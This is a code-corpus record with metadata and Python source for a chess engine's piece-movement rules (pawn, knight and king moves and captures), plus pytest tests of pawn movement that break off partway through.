"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/1 下午7:31\n# @Author : Meng Xiao\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\nclass Solution:\n def deleteDuplication(self, pHead):\n if pHead is None or pHead.next is None:\n return pHead\n first = ListNode(-1)\n first.next = pHead\n last = first\n while pHead and pHead.next:\n if pHead.val == pHead.next.val:\n val = pHead.val\n while pHead and val == pHead.val:\n pHead = pHead.next\n last.next = pHead\n else:\n last = pHead\n pHead = pHead.next\n\n return first.next"
},
{
"alpha_fraction": 0.3986014127731323,
"alphanum_fraction": 0.43706294894218445,
"avg_line_length": 29.052631378173828,
"blob_id": "8b0611dd9543188fbcf151eaee65b738f1ba2e3b",
"content_id": "d3da1c371f512a417baed31b5229664820b6741a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 576,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 19,
"path": "/0~n-1中缺失的数字.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/16 下午10:08\n# @Author : Meng Xiao\nclass Solution:\n def GetMissingNumber(self, numbers, length):\n if not numbers or length <= 0:\n return -1\n left = 0\n right = length - 1\n while left <= right:\n mid = (left + right) // 2\n if numbers[mid] != mid:\n if mid == 0 or numbers[mid-1] == mid - 1:\n return mid\n right = mid - 1\n else:\n left = mid + 1\n if left == length:\n return length\n\n"
},
{
"alpha_fraction": 0.47411444783210754,
"alphanum_fraction": 0.47820162773132324,
"avg_line_length": 19.375,
"blob_id": "bd7e4b7def6338917f98f20b19b34623a9d169d2",
"content_id": "b5cda1d7f01d3283261245c8938847ebf69debef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1508,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 72,
"path": "/test.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "class ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n\n def head_tail(self, head):\n\n if not head or not head.next:\n return head\n # 找中间结点\n mid = head\n right = head.next\n while right.next and right.next.next:\n mid = mid.next\n right = right.next.next\n right = mid.next\n mid.next = None\n\n right = self.reverse_list(right) # 链表反转\n\n # left和right依次相连\n cur = head\n while cur.next:\n tmp = cur.next\n cur.next = right\n right = right.next\n cur.next.next = tmp\n cur = tmp\n cur.next = right\n\n return head\n\n def reverse_list(self, head): # 就地逆\n if not head or not head.next:\n return head\n prev = None\n cur = head\n while cur:\n nxt = cur.next\n cur.next = prev\n prev = cur\n cur = nxt\n return prev\n\ndef print_list(head):\n if head == None:\n return\n while head:\n print(head.val, end=' ')\n head = head.next\n print()\n\n# 测试:\n\nif __name__ == '__main__':\n a = ListNode(1)\n b = ListNode(2)\n c = ListNode(3)\n d = ListNode(4)\n e = ListNode(5)\n f = ListNode(6)\n a.next = b\n b.next = c\n c.next = d\n d.next = e\n e.next = f\n s = Solution()\n print_list(a)\n dummy = s.head_tail(a)\n print_list(dummy)\n\n"
},
{
"alpha_fraction": 0.41993463039398193,
"alphanum_fraction": 0.46078431606292725,
"avg_line_length": 31.210525512695312,
"blob_id": "58d34fa123af4dab072b3d7d00ec6628eb83446c",
"content_id": "f63119434cf79f104a47b1c5f36f01b3a0c4aa98",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 616,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 19,
"path": "/leetcode-135分发糖果.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/16 下午11:59\n# @Author : Meng Xiao\n\nclass Solution:\n def candy(self, ratings: List[int]) -> int:\n if not ratings:\n return 0\n left = [1 for _ in range(len(ratings))]\n right = left[:]\n for i in range(1, len(ratings)):\n if ratings[i] > ratings[i - 1]:\n left[i] = left[i - 1] + 1\n count = left[-1]\n for j in range(len(ratings) - 2, -1, -1):\n if ratings[j] > ratings[j + 1]:\n right[j] = right[j + 1] + 1\n count += max(left[j], right[j])\n return count\n"
},
{
"alpha_fraction": 0.46875,
"alphanum_fraction": 0.554347813129425,
"avg_line_length": 24.34482765197754,
"blob_id": "6a96cb1e03058178b8632c9cad5f6185754a2809",
"content_id": "d798e57cd60bfa3acec97b8bf2c8687eb3e61529",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 880,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 29,
"path": "/0-1背包问题.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/6/11 19:41\n# @Author : Meng Xiao\n'''\n输入:\n第一行是一个正整数,表示总容量\n第二行是一个长度为n的数组,代表物品重量\n第三行是一个长度为n的数组,代表物品价值\n输出:\n最大价值\nexample:\n1000\n200 600 100 180 300 450\n6 10 3 4 5 8\noutput: 21\n'''\nimport numpy as np\n# 0-1背包\nclass Solution:\n def bag0_1(self, wlist, vlist, totalWeight):\n totalLength = len(vlist) # 表示物品的数量\n dpArr = np.zeros((totalLength+1, totalWeight+1), dtype=np.int32)\n for i in range(1, totalLength+1):\n for j in range(1, totalWeight+1):\n if wlist[i-1] <= j:\n dpArr[i][j] = max(dpArr[i-1][j], dpArr[i-1][j-wlist[i-1]]+vlist[i-1])\n else:\n dpArr[i][j] = dpArr[i-1][j]\n return dpArr[-1][-1]\n\n"
},
{
"alpha_fraction": 0.40376266837120056,
"alphanum_fraction": 0.4659913182258606,
"avg_line_length": 30.454545974731445,
"blob_id": "aae210462db52ebc63d1157df9ff253c067e622a",
"content_id": "6e91afaba3059385a27b89b4daccd0035cdc21c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 22,
"path": "/礼物的最大价值.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/15 下午8:29\n# @Author : Meng Xiao\nclass Solution:\n def getMaxValue(self, values, rows, cols):\n if not values or rows <= 0 or cols <= 0:\n return 0\n max_value = [0] * cols\n for i in range(rows):\n for j in range(cols):\n left, up = 0, 0\n if i > 0:\n up = max_value[j]\n if j > 0:\n left = max_value[j-1]\n max_value[j] = max(left, up) + values[i * cols + j]\n maxValue = max_value[cols-1]\n\n return maxValue\ns = Solution()\nmatrix = [1,10,3,8,12,2,9,6,5,7,4,11,3,7,16,5]\nprint(s.getMaxValue(matrix, 4,4))"
},
{
"alpha_fraction": 0.3409818708896637,
"alphanum_fraction": 0.369263619184494,
"avg_line_length": 30.25,
"blob_id": "02037ecaef592610cc40916b8c36539d8b1a23f9",
"content_id": "7fdc803682d9f5c3494d0693be328630174549bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2048,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 60,
"path": "/leetcode-5最长回文子串.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/5/7 19:32\n# @Author : Meng Xiao\nclass Solution:\n# 法1 : 依次把每个字符作为回文字符串的中间字符。\n def longestPalindrome1(self, s):\n n = len(s)\n maxLength = 0\n left = right = 0\n for i in range(n):\n # 长度为奇数情况:\n for j in range(min(i+1, n-i)):\n if s[i-j] != s[i+j]:\n break\n if 2 * j + 1 > maxLength:\n maxLength = 2 * j + 1\n left = i - j\n right = i + j\n # 偶数\n if i + 1 < n and s[i] == s[i+1]:\n for j in range(min(i+1, n-i-1)):\n if s[i-j] != s[i+1+j]:\n break\n if 2 * j + 2 > maxLength:\n maxLength = 2 * j + 2\n left = i - j\n right = i + j + 1\n return s[left:right+1]\n\n # 法2:Manacher算法.https://www.felix021.com/blog/read.php?2040\n def longestPalindrome2(self, s):\n def preProcess(s):\n if not s:\n return ['^', '$']\n T = ['^']\n for i in s:\n T += ['#', i]\n T += ['#', '$']\n return T\n T = preProcess(s)\n P = [0] * len(T) # P[i]表示以s[i]为回文串中心时,此回文串的长度\n id, mx = 0, 0 # id表示最大回文串中心的位置,mx则为id+P[id],即最大回文串的右边界\n for i in range(1, len(T)-1):\n j = 2 * id - i # j为i关于id的对称位置\n if mx > i:\n P[i] = min(P[j], mx-i)\n else:\n P[i] = 0\n while T[i+P[i]+1] == T[i-P[i]-1]:\n P[i] += 1\n if i + P[i] > mx:\n id, mx = i, i + P[i]\n max_i = P.index(max(P))\n start = (max_i - P[max_i] - 1) // 2\n res = s[start:start+P[max_i]]\n return res\n\n\ns = Solution()\nprint(s.longestPalindrome2('babad'))"
},
{
"alpha_fraction": 0.4092409312725067,
"alphanum_fraction": 0.4532453119754791,
"avg_line_length": 24.97142791748047,
"blob_id": "b8626bd3f86e83c8e42dfb11ffb4ee4b32974154",
"content_id": "97605542d5f5cf5b5ab753fab9c790a24e93ffe5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 909,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 35,
"path": "/leetcode-2.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/5/5 20:46\n# @Author : Meng Xiao\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n\n def addTwoNumbers(self, l1, l2):\n if not l1:\n return l2\n if not l2:\n return l1\n cur = head = ListNode(-1)\n carry = 0\n while l1 and l2:\n value = (l1.val + l2.val + carry) % 10\n carry = (l1.val + l2.val + carry) // 10\n cur.next = ListNode(value)\n cur = cur.next\n l1 = l1.next\n l2 = l2.next\n rest = l1 or l2\n while rest:\n value = (rest.val + carry) % 10\n cur.next = ListNode(value)\n carry = (rest.val + carry) // 10\n cur = cur.next\n rest = rest.next\n if carry:\n cur.next = ListNode(1)\n return head.next\n"
},
{
"alpha_fraction": 0.39759036898612976,
"alphanum_fraction": 0.4277108311653137,
"avg_line_length": 22.75,
"blob_id": "2123223fc0828f0a3adb909c5ca082dd033aa370",
"content_id": "87c3a653bcb1847285fbd35e40a99d8ed9271b71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 668,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 28,
"path": "/质因数分解.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/22 下午5:24\n# @Author : Meng Xiao\nclass Solution:\n def is_Prime(self, n):\n for i in range(2,int(n ** 0.5)+1):\n flag = n % i\n if flag == 0:\n return False\n return True\n def prime_de(self, n):\n if self.is_Prime(n):\n return [n]\n prime = []\n for i in range(2, n//2):\n if self.is_Prime(i):\n prime.append(i)\n print(prime)\n for item in prime:\n while n % item == 0:\n print(item)\n n /= item\n continue\n return\n\n\ns = Solution()\nprint(s.prime_de(4))"
},
{
"alpha_fraction": 0.36920660734176636,
"alphanum_fraction": 0.4014139771461487,
"avg_line_length": 26.69565200805664,
"blob_id": "2dec79b88b2518d7bf943ef3c4997d89afd709f1",
"content_id": "7a41c3c9ad9b76b879425d33190c030c2faf1db2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1277,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 46,
"path": "/数字在排序数组中出现的次数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/16 下午9:55\n# @Author : Meng Xiao\nclass Solution:\n\n def GetNumberOfK(self, data, k):\n if not data:\n return 0\n if self.GetFirstK(data, k) == -1 and self.GetLastK(data, k) == -1:\n return 0\n return self.GetLastK(data, k) - self.GetFirstK(data, k) + 1\n\n def GetFirstK(self, data, k):\n low = 0\n high = len(data) - 1\n while low <= high:\n mid = (low+high) // 2\n if data[mid] < k:\n low = mid + 1\n elif data[mid] > k:\n high = mid - 1\n else:\n if mid == low or data[mid-1] != k:\n return mid\n else:\n high = mid - 1\n return -1\n\n def GetLastK(self, data, k):\n low = 0\n high = len(data) - 1\n while low <= high:\n mid = (low + high) // 2\n if data[mid] < k:\n low = mid + 1\n elif data[mid] > k:\n high = mid - 1\n else:\n if mid == high or data[mid + 1] != k:\n return mid\n else:\n low = mid + 1\n return -1\n\ns = Solution()\nprint(s.GetNumberOfK([1,2,3,3,3,3,4,5],3))"
},
{
"alpha_fraction": 0.3979797959327698,
"alphanum_fraction": 0.4505050480365753,
"avg_line_length": 25.105262756347656,
"blob_id": "e51265bca6e1e25286b37a076e2e0406ffa04349",
"content_id": "ac5794682d7f4cbec0def1932522403fc5775c2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 499,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 19,
"path": "/构建乘积数组.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午10:11\n# @Author : Meng Xiao\nclass Solution:\n def multiply(self, A):\n if not A or len(A) <= 0:\n return\n length = len(A)\n lis = [1] * length\n for i in range(1, length):\n lis[i] = lis[i-1] * A[i-1]\n print(lis)\n temp = 1\n for i in range(length-2, -1, -1):\n temp = temp * A[i+1]\n lis[i] *= temp\n return lis\ns = Solution()\nprint(s.multiply([1,2,3,4]))"
},
{
"alpha_fraction": 0.4810379147529602,
"alphanum_fraction": 0.514970064163208,
"avg_line_length": 24.71794891357422,
"blob_id": "adeac9b34f472ef9691233540309230ce479cf2e",
"content_id": "89f03878a25584cac948ccb9ae961e4ac75db62c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1020,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 39,
"path": "/aaa.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# 线段\ndef func(num_list):\n start = 1000\n end = 0\n for one_list in num_list:\n if one_list[0] < start:\n start = one_list[0]\n if one_list[1] > end:\n end = one_list[1]\n print(start, end)\n\n flag = [False] * end\n for i in range(len(num_list)):\n for j in range(num_list[i][0], num_list[i][1]):\n flag[j] = True\n print(flag)\n return flag.count(True)\n\n# n_list = [[1,3],[2,7],[9,11],[13,20],[15,30]]\n# print(func(n_list))\n\n# 最大不重复子串\ndef LongestSubStr(s):\n if not s or len(s) < 2:\n return s\n pindex = [-1] * 26\n curLength = 0\n maxLength = 0\n for i in range(len(s)):\n preIndex = pindex[ord(s[i])-ord('a')]\n if preIndex < 0 or i - preIndex > curLength:\n curLength += 1\n else:\n if curLength > maxLength:\n maxLength = curLength\n curLength = i - preIndex\n pindex[ord(s[i]) - ord('a')] = i\n return maxLength\nprint(LongestSubStr('arabcacfr'))"
},
{
"alpha_fraction": 0.3368421196937561,
"alphanum_fraction": 0.3684210479259491,
"avg_line_length": 26.214284896850586,
"blob_id": "b5ecbcf6b06ce178b251713325b45b8a2967c424",
"content_id": "d6d631f9304e17acd2947dfdaab0174de054a411",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 380,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 14,
"path": "/leetcode-20有效的括号.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/6/17 20:39\n# @Author : Meng Xiao\nclass Solution:\n def isValid(self, s):\n mp = {')': '(', ']': '[', '}': '{'}\n stk = []\n for ch in s:\n if ch in '([{':\n stk.append(ch)\n else:\n if not stk or mp[ch] != stk.pop():\n return False\n return not stk"
},
{
"alpha_fraction": 0.5207316875457764,
"alphanum_fraction": 0.54756098985672,
"avg_line_length": 19,
"blob_id": "8fb2bd0bc1b5e7fa24ab3bdd5ec0232d52aec358",
"content_id": "7ba037144bfa1036473d5478aa6492a8f7378737",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 824,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 41,
"path": "/平衡二叉树.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/17 下午9:20\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n def __init__(self):\n self.flag = True\n\n def isBalanced(self, root):\n self.getDepth(root)\n return self.flag\n\n def getDepth(self, root):\n if not root:\n return 0\n left = self.getDepth(root.left) + 1\n right = self.getDepth(root.right) + 1\n if abs(left - right) > 1:\n self.flag = False\n return max(left, right)\n\ns = Solution()\na = TreeNode(1)\nb = TreeNode(2)\nc = TreeNode(3)\nd = TreeNode(4)\ne = TreeNode(5)\nf = TreeNode(6)\ng = TreeNode(7)\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.right = f\ne.left = g\n\nprint(s.isBalanced(a))\n"
}
] | 99 |
Charnub/chessington-python
|
https://github.com/Charnub/chessington-python
|
fe44b724e570c308638cf6f6d439bb3032bd4cfb
|
d0e94bedb586b7886b945cf22e1937b62b747031
|
9b05ca1cb46f06c97f4dd440bda853879e073659
|
refs/heads/master
| 2020-07-27T23:54:10.835241 | 2019-09-18T15:54:16 | 2019-09-18T15:54:16 | 209,248,525 | 0 | 0 | null | 2019-09-18T07:42:19 | 2019-08-01T12:56:14 | 2019-08-01T14:36:29 | null |
[
{
"alpha_fraction": 0.6047889590263367,
"alphanum_fraction": 0.6131819486618042,
"avg_line_length": 30.169231414794922,
"blob_id": "3a48776fbe24c3f600e249801dbf0ac0c0926625",
"content_id": "55e83e099a0a336851d31a09226262872a6b17ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4051,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 130,
"path": "/chessington/engine/pieces.py",
"repo_name": "Charnub/chessington-python",
"src_encoding": "UTF-8",
"text": "\"\"\"\nDefinitions of each of the different chess pieces.\n\"\"\"\n\nfrom abc import ABC, abstractmethod\n\nfrom chessington.engine.data import Player, Square\n\nclass Piece(ABC):\n \"\"\"\n An abstract base class from which all pieces inherit.\n \"\"\"\n\n def __init__(self, player):\n self.player = player\n self.moved = False\n\n @abstractmethod\n def get_available_moves(self, board):\n \"\"\"\n Get all squares that the piece is allowed to move to.\n \"\"\"\n pass\n\n def move_to(self, board, new_square):\n \"\"\"\n Move this piece to the given square on the board.\n \"\"\"\n current_square = board.find_piece(self)\n board.move_piece(current_square, new_square)\n self.moved = True\n\n def is_free(self, board, square):\n return board.squareBound(square) and \\\n (board.emptySquare(square) or self.capture_piece(board.get_piece(square)))\n\n def can_capture(self, board, square):\n return (board.squareBound(square) and\n board.fullSquare(square) and\n board.get_piece(square).player != self.player)\n\n def capture_piece(self, piece):\n return piece.player != self.player\n\n\nclass Pawn(Piece):\n \"\"\"\n A class representing a chess pawn.\n \"\"\"\n\n def get_available_moves(self, board):\n\n location = board.find_piece(self) # Finds current position of piece\n piece = 1 if self.player == Player.WHITE else -1\n single_move = Square.at(location.row + piece, location.col) # Will move one space\n double_move = Square.at(location.row + 2 * piece, location.col) # Will move 2 spaces\n\n board_moves = []\n\n if not board.squareBound(single_move) or board.fullSquare(single_move): #\n board_moves = []\n elif self.moved or not board.squareBound(double_move) or board.fullSquare(double_move):\n board_moves = [single_move]\n else:\n board_moves = [single_move, double_move]\n\n board_capture = [Square.at(location.row + piece, location.col + 1), Square.at(location.row + piece, location.col - 1)]\n board_capture = list(filter(lambda square: self.can_capture(board, square), board_capture))\n\n return board_moves + board_capture\n\n\nclass Knight(Piece):\n \"\"\"\n A class representing a chess knight.\n \"\"\"\n\n def get_available_moves(self, board):\n location = board.find_piece(self)\n knight_moves = [\n Square.at(location.row + 2, location.col + 1), Square.at(location.row + 2, location.col - 1),\n Square.at(location.row + 1, location.col + 2), Square.at(location.row + 1, location.col - 2),\n Square.at(location.row - 2, location.col + 1), Square.at(location.row - 2, location.col - 1),\n Square.at(location.row - 1, location.col + 2), Square.at(location.row - 1, location.col - 2),\n ]\n return list(filter(lambda square: self.is_free(board, square), knight_moves))\n\n\nclass Bishop(Piece):\n \"\"\"\n A class representing a chess bishop.\n \"\"\"\n\n def get_available_moves(self, board):\n return []\n\n\nclass Rook(Piece):\n \"\"\"\n A class representing a chess rook.\n \"\"\"\n\n def get_available_moves(self, board):\n return []\n\n\nclass Queen(Piece):\n \"\"\"\n A class representing a chess queen.\n \"\"\"\n\n def get_available_moves(self, board):\n return []\n\n\nclass King(Piece):\n \"\"\"\n A class representing a chess king.\n \"\"\"\n\n def get_available_moves(self, board):\n location = board.find_piece(self)\n\n king_moves = [\n Square.at(location.row + 1, location.col + 1), Square.at(location.row + 1, location.col), Square.at(location.row + 1, location.col - 1),\n Square.at(location.row, location.col + 1), Square.at(location.row, location.col - 1),\n Square.at(location.row - 1, location.col + 
1), Square.at(location.row - 1, location.col), Square.at(location.row - 1, location.col - 1)\n ]\n\n return list(filter(lambda square: self.is_free(board, square), king_moves))"
},
{
"alpha_fraction": 0.5719543099403381,
"alphanum_fraction": 0.5846407413482666,
"avg_line_length": 25.01259422302246,
"blob_id": "6b4df5a7c864c0fba72892ca2bb30ffe6aece3b8",
"content_id": "5c1d8031dbbef60471760efbbd24f95db34487f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10326,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 397,
"path": "/tests/test_pieces.py",
"repo_name": "Charnub/chessington-python",
"src_encoding": "UTF-8",
"text": "from chessington.engine.board import Board\nfrom chessington.engine.data import Player, Square\nfrom chessington.engine.pieces import Pawn, Knight\n\nclass TestPawns:\n\n @staticmethod\n def test_white_pawns_can_move_up_one_square():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n square = Square.at(1, 4)\n board.set_piece(square, pawn)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(2, 4) in moves\n\n @staticmethod\n def test_black_pawns_can_move_down_one_square():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n square = Square.at(6, 4)\n board.set_piece(square, pawn)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(5, 4) in moves\n\n @staticmethod\n def test_white_pawn_can_move_up_two_squares_if_not_moved():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n square = Square.at(1, 4)\n board.set_piece(square, pawn)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(3, 4) in moves\n\n @staticmethod\n def test_black_pawn_can_move_down_two_squares_if_not_moved():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n square = Square.at(6, 4)\n board.set_piece(square, pawn)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(4, 4) in moves\n\n @staticmethod\n def test_white_pawn_cannot_move_up_two_squares_if_already_moved():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n starting_square = Square.at(1, 4)\n board.set_piece(starting_square, pawn)\n\n intermediate_square = Square.at(2, 4)\n pawn.move_to(board, intermediate_square)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(4, 4) not in moves\n\n @staticmethod\n def test_black_pawn_cannot_move_down_two_squares_if_already_moved():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n starting_square = Square.at(6, 4)\n board.set_piece(starting_square, pawn)\n\n intermediate_square = Square.at(5, 4)\n pawn.move_to(board, intermediate_square)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(3, 4) not in moves\n\n @staticmethod\n def test_white_pawn_cannot_move_if_piece_in_front():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n pawn_square = Square.at(4, 4)\n board.set_piece(pawn_square, pawn)\n\n obstructing_square = Square.at(5, 4)\n obstruction = Pawn(Player.BLACK)\n board.set_piece(obstructing_square, obstruction)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert len(moves) == 0\n\n @staticmethod\n def test_black_pawn_cannot_move_if_piece_in_front():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n pawn_square = Square.at(4, 4)\n board.set_piece(pawn_square, pawn)\n\n obstructing_square = Square.at(3, 4)\n obstruction = Pawn(Player.WHITE)\n board.set_piece(obstructing_square, obstruction)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert len(moves) == 0\n\n @staticmethod\n def test_white_pawn_cannot_move_two_squares_if_piece_two_in_front():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n pawn_square = Square.at(4, 4)\n board.set_piece(pawn_square, pawn)\n\n obstructing_square = Square.at(6, 4)\n obstruction = Pawn(Player.BLACK)\n board.set_piece(obstructing_square, obstruction)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert obstructing_square not in moves\n\n @staticmethod\n def 
test_black_pawn_cannot_move_two_squares_if_piece_two_in_front():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n pawn_square = Square.at(4, 4)\n board.set_piece(pawn_square, pawn)\n\n obstructing_square = Square.at(2, 4)\n obstruction = Pawn(Player.WHITE)\n board.set_piece(obstructing_square, obstruction)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert obstructing_square not in moves\n\n @staticmethod\n def test_white_pawn_cannot_move_two_squares_if_piece_one_in_front():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n pawn_square = Square.at(1, 4)\n board.set_piece(pawn_square, pawn)\n\n obstructing_square = Square.at(2, 4)\n obstruction = Pawn(Player.BLACK)\n board.set_piece(obstructing_square, obstruction)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(3, 4) not in moves\n\n @staticmethod\n def test_black_pawn_cannot_move_two_squares_if_piece_one_in_front():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n pawn_square = Square.at(6, 4)\n board.set_piece(pawn_square, pawn)\n\n obstructing_square = Square.at(5, 4)\n obstruction = Pawn(Player.WHITE)\n board.set_piece(obstructing_square, obstruction)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(4, 4) not in moves\n\n @staticmethod\n def test_white_pawn_cannot_move_at_top_of_board():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n square = Square.at(7, 4)\n board.set_piece(square, pawn)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert len(moves) == 0\n\n @staticmethod\n def test_black_pawn_cannot_move_at_bottom_of_board():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n square = Square.at(0, 4)\n board.set_piece(square, pawn)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert len(moves) == 0\n\n @staticmethod\n def test_white_pawns_can_capture_diagonally():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n pawn_square = Square.at(3, 4)\n board.set_piece(pawn_square, pawn)\n\n enemy1 = Pawn(Player.BLACK)\n enemy1_square = Square.at(4, 5)\n board.set_piece(enemy1_square, enemy1)\n\n enemy2 = Pawn(Player.BLACK)\n enemy2_square = Square.at(4, 3)\n board.set_piece(enemy2_square, enemy2)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert enemy1_square in moves\n assert enemy2_square in moves\n\n @staticmethod\n def test_black_pawns_can_capture_diagonally():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n pawn_square = Square.at(3, 4)\n board.set_piece(pawn_square, pawn)\n\n enemy1 = Pawn(Player.WHITE)\n enemy1_square = Square.at(2, 5)\n board.set_piece(enemy1_square, enemy1)\n\n enemy2 = Pawn(Player.WHITE)\n enemy2_square = Square.at(2, 3)\n board.set_piece(enemy2_square, enemy2)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert enemy1_square in moves\n assert enemy2_square in moves\n\n @staticmethod\n def test_white_pawns_cannot_move_diagonally_except_to_capture():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n pawn_square = Square.at(3, 4)\n board.set_piece(pawn_square, pawn)\n\n friendly = Pawn(Player.WHITE)\n friendly_square = Square.at(4, 5)\n board.set_piece(friendly_square, friendly)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(4, 3) not in moves\n assert Square.at(4, 5) not in moves\n\n @staticmethod\n def test_black_pawns_can_capture_diagonally2():\n\n 
